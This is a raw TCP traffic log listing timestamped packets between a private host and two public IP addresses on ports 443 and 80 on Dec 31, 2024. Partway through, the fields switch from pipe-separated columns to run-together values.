Dec 31, 2024 15:41:58.094603062 CET | 443 | 49705 | 34.200.57.114 | 192.168.2.9
Dec 31, 2024 15:41:58.096095085 CET | 443 | 49705 | 34.200.57.114 | 192.168.2.9
Dec 31, 2024 15:41:58.096178055 CET | 49705 | 443 | 192.168.2.9 | 34.200.57.114
Dec 31, 2024 15:41:58.097635031 CET | 49705 | 443 | 192.168.2.9 | 34.200.57.114
Dec 31, 2024 15:41:58.097708941 CET | 443 | 49705 | 34.200.57.114 | 192.168.2.9
Dec 31, 2024 15:41:58.108655930 CET | 49705 | 443 | 192.168.2.9 | 34.200.57.114
Dec 31, 2024 15:41:58.108669043 CET | 443 | 49705 | 34.200.57.114 | 192.168.2.9
Dec 31, 2024 15:41:58.159591913 CET | 49705 | 443 | 192.168.2.9 | 34.200.57.114
Dec 31, 2024 15:41:58.209000111 CET | 443 | 49705 | 34.200.57.114 | 192.168.2.9
Dec 31, 2024 15:41:58.209106922 CET | 443 | 49705 | 34.200.57.114 | 192.168.2.9
Dec 31, 2024 15:41:58.209217072 CET | 49705 | 443 | 192.168.2.9 | 34.200.57.114
Dec 31, 2024 15:41:58.218745947 CET | 49705 | 443 | 192.168.2.9 | 34.200.57.114
Dec 31, 2024 15:41:58.218765020 CET | 443 | 49705 | 34.200.57.114 | 192.168.2.9
Dec 31, 2024 15:41:59.738719940 CET | 49706 | 80 | 192.168.2.9 | 34.147.147.173
Dec 31, 2024 15:41:59.743556976 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:41:59.743634939 CET | 49706 | 80 | 192.168.2.9 | 34.147.147.173
Dec 31, 2024 15:41:59.750154018 CET | 49706 | 80 | 192.168.2.9 | 34.147.147.173
Dec 31, 2024 15:41:59.755065918 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:41:59.755079031 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:41:59.755106926 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:41:59.755116940 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:41:59.755131960 CET | 49706 | 80 | 192.168.2.9 | 34.147.147.173
Dec 31, 2024 15:41:59.755189896 CET | 49706 | 80 | 192.168.2.9 | 34.147.147.173
Dec 31, 2024 15:41:59.755194902 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:41:59.755218983 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:41:59.755235910 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:41:59.755239964 CET | 49706 | 80 | 192.168.2.9 | 34.147.147.173
Dec 31, 2024 15:41:59.755245924 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:41:59.755266905 CET | 49706 | 80 | 192.168.2.9 | 34.147.147.173
Dec 31, 2024 15:41:59.755279064 CET | 49706 | 80 | 192.168.2.9 | 34.147.147.173
Dec 31, 2024 15:41:59.755284071 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:41:59.755295992 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:41:59.755301952 CET | 49706 | 80 | 192.168.2.9 | 34.147.147.173
Dec 31, 2024 15:41:59.755323887 CET | 49706 | 80 | 192.168.2.9 | 34.147.147.173
Dec 31, 2024 15:41:59.755350113 CET | 49706 | 80 | 192.168.2.9 | 34.147.147.173
Dec 31, 2024 15:41:59.759974957 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:41:59.760035038 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:41:59.760042906 CET | 49706 | 80 | 192.168.2.9 | 34.147.147.173
Dec 31, 2024 15:41:59.760099888 CET | 49706 | 80 | 192.168.2.9 | 34.147.147.173
Dec 31, 2024 15:41:59.760162115 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:41:59.760195971 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:41:59.760216951 CET | 49706 | 80 | 192.168.2.9 | 34.147.147.173
Dec 31, 2024 15:41:59.760238886 CET | 49706 | 80 | 192.168.2.9 | 34.147.147.173
Dec 31, 2024 15:41:59.760267019 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:41:59.760277033 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:41:59.760319948 CET | 49706 | 80 | 192.168.2.9 | 34.147.147.173
Dec 31, 2024 15:41:59.760339022 CET | 49706 | 80 | 192.168.2.9 | 34.147.147.173
Dec 31, 2024 15:41:59.803369045 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:41:59.803518057 CET | 49706 | 80 | 192.168.2.9 | 34.147.147.173
Dec 31, 2024 15:41:59.855361938 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:41:59.855417013 CET | 49706 | 80 | 192.168.2.9 | 34.147.147.173
Dec 31, 2024 15:41:59.903542995 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:41:59.903620005 CET | 49706 | 80 | 192.168.2.9 | 34.147.147.173
Dec 31, 2024 15:41:59.951400042 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:41:59.951467991 CET | 49706 | 80 | 192.168.2.9 | 34.147.147.173
Dec 31, 2024 15:41:59.999440908 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:41:59.999505997 CET | 49706 | 80 | 192.168.2.9 | 34.147.147.173
Dec 31, 2024 15:42:00.047421932 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.047487974 CET | 49706 | 80 | 192.168.2.9 | 34.147.147.173
Dec 31, 2024 15:42:00.095511913 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.095577002 CET | 49706 | 80 | 192.168.2.9 | 34.147.147.173
Dec 31, 2024 15:42:00.143352032 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.143408060 CET | 49706 | 80 | 192.168.2.9 | 34.147.147.173
Dec 31, 2024 15:42:00.171138048 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.171318054 CET | 49706 | 80 | 192.168.2.9 | 34.147.147.173
Dec 31, 2024 15:42:00.176188946 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.176199913 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.176234961 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.176244974 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.176259041 CET | 49706 | 80 | 192.168.2.9 | 34.147.147.173
Dec 31, 2024 15:42:00.176270962 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.176280975 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.176311970 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.176316977 CET | 49706 | 80 | 192.168.2.9 | 34.147.147.173
Dec 31, 2024 15:42:00.176321030 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.176358938 CET | 49706 | 80 | 192.168.2.9 | 34.147.147.173
Dec 31, 2024 15:42:00.176373005 CET | 49706 | 80 | 192.168.2.9 | 34.147.147.173
Dec 31, 2024 15:42:00.176397085 CET | 49706 | 80 | 192.168.2.9 | 34.147.147.173
Dec 31, 2024 15:42:00.176402092 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.176412106 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.176423073 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.176453114 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.176456928 CET | 49706 | 80 | 192.168.2.9 | 34.147.147.173
Dec 31, 2024 15:42:00.176495075 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.176497936 CET | 49706 | 80 | 192.168.2.9 | 34.147.147.173
Dec 31, 2024 15:42:00.176526070 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.176564932 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.176564932 CET | 49706 | 80 | 192.168.2.9 | 34.147.147.173
Dec 31, 2024 15:42:00.176593065 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.176618099 CET | 49706 | 80 | 192.168.2.9 | 34.147.147.173
Dec 31, 2024 15:42:00.176639080 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.176708937 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.176733971 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.176808119 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.176836014 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.176846027 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.176913977 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.176951885 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.176986933 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.177058935 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.177099943 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.177156925 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.177172899 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.177277088 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.177369118 CET | 49706 | 80 | 192.168.2.9 | 34.147.147.173
Dec 31, 2024 15:42:00.181086063 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.181153059 CET | 49706 | 80 | 192.168.2.9 | 34.147.147.173
Dec 31, 2024 15:42:00.181173086 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.181184053 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.181236029 CET | 49706 | 80 | 192.168.2.9 | 34.147.147.173
Dec 31, 2024 15:42:00.181257010 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.181277037 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.181324005 CET | 49706 | 80 | 192.168.2.9 | 34.147.147.173
Dec 31, 2024 15:42:00.181329012 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.181346893 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.181413889 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.181449890 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.181549072 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.181647062 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.181669950 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.181679964 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.181710958 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.181792021 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.181802988 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.181812048 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.181835890 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.181844950 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.181883097 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.181891918 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.181931973 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.181941032 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.182151079 CET | 49706 | 80 | 192.168.2.9 | 34.147.147.173
Dec 31, 2024 15:42:00.182158947 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.182209969 CET | 49706 | 80 | 192.168.2.9 | 34.147.147.173
Dec 31, 2024 15:42:00.182213068 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.182260036 CET | 49706 | 80 | 192.168.2.9 | 34.147.147.173
Dec 31, 2024 15:42:00.182296991 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.182337046 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.182344913 CET | 49706 | 80 | 192.168.2.9 | 34.147.147.173
Dec 31, 2024 15:42:00.182379007 CET | 49706 | 80 | 192.168.2.9 | 34.147.147.173
Dec 31, 2024 15:42:00.182385921 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.182432890 CET | 49706 | 80 | 192.168.2.9 | 34.147.147.173
Dec 31, 2024 15:42:00.182435036 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.182445049 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.182454109 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.182507038 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.182507038 CET | 49706 | 80 | 192.168.2.9 | 34.147.147.173
Dec 31, 2024 15:42:00.182517052 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.182527065 CET | 49706 | 80 | 192.168.2.9 | 34.147.147.173
Dec 31, 2024 15:42:00.182542086 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.182552099 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.182593107 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.182609081 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.182624102 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.182631969 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.182666063 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.182676077 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.182708979 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.182718039 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.182742119 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.182750940 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.182771921 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.182780027 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.182812929 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.182825089 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.182842970 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.182851076 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.182883024 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
Dec 31, 2024 15:42:00.182893038 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.9
                                    Dec 31, 2024 15:42:00.182920933 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.182929993 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.182961941 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.182970047 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.182996988 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.183006048 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.183036089 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.183047056 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.183085918 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.183103085 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.183120012 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.183135033 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.183150053 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.183166027 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.183176041 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.185940027 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.185995102 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.186050892 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.186060905 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.186116934 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.186130047 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.186161995 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.186171055 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.186963081 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.186981916 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.186999083 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187015057 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187030077 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187050104 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187072039 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187082052 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187139988 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187149048 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187191010 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187200069 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187206984 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187225103 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187388897 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187397003 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187398911 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:00.187426090 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187458992 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:00.187480927 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187551975 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187643051 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187686920 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187695980 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187834024 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187843084 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187850952 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187906027 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187988997 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187999010 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188045979 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188057899 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188077927 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188086987 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188144922 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188153982 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188209057 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188218117 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188260078 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188268900 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188316107 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188338041 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188368082 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188376904 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188404083 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188415051 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188424110 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188441038 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188456059 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188472033 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188493967 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188502073 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188512087 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188519955 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188544035 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192267895 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192286968 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192351103 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192375898 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192404985 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192413092 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192435980 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192444086 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192459106 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192470074 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192495108 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192502975 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192537069 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192545891 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192595005 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:00.192631960 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192645073 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192662954 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192672014 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192687035 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192720890 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192735910 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192744017 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192751884 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192770004 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192784071 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192791939 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192825079 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192833900 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192854881 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192862988 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192898989 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192914963 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192935944 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192945957 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192960024 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192967892 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.193017960 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.193026066 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.193047047 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.193056107 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.193067074 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.193121910 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.193130016 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.193144083 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.193165064 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.193173885 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.193181992 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.193200111 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.193216085 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.193224907 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.193260908 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.193269968 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.193284988 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.197526932 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.197566986 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.197598934 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.197695971 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.197844028 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.197853088 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.197863102 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.197870970 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.197938919 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198075056 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198085070 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198093891 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198101997 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198131084 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198148966 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198164940 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198174000 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198191881 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198199987 CET804970634.147.147.173192.168.2.9
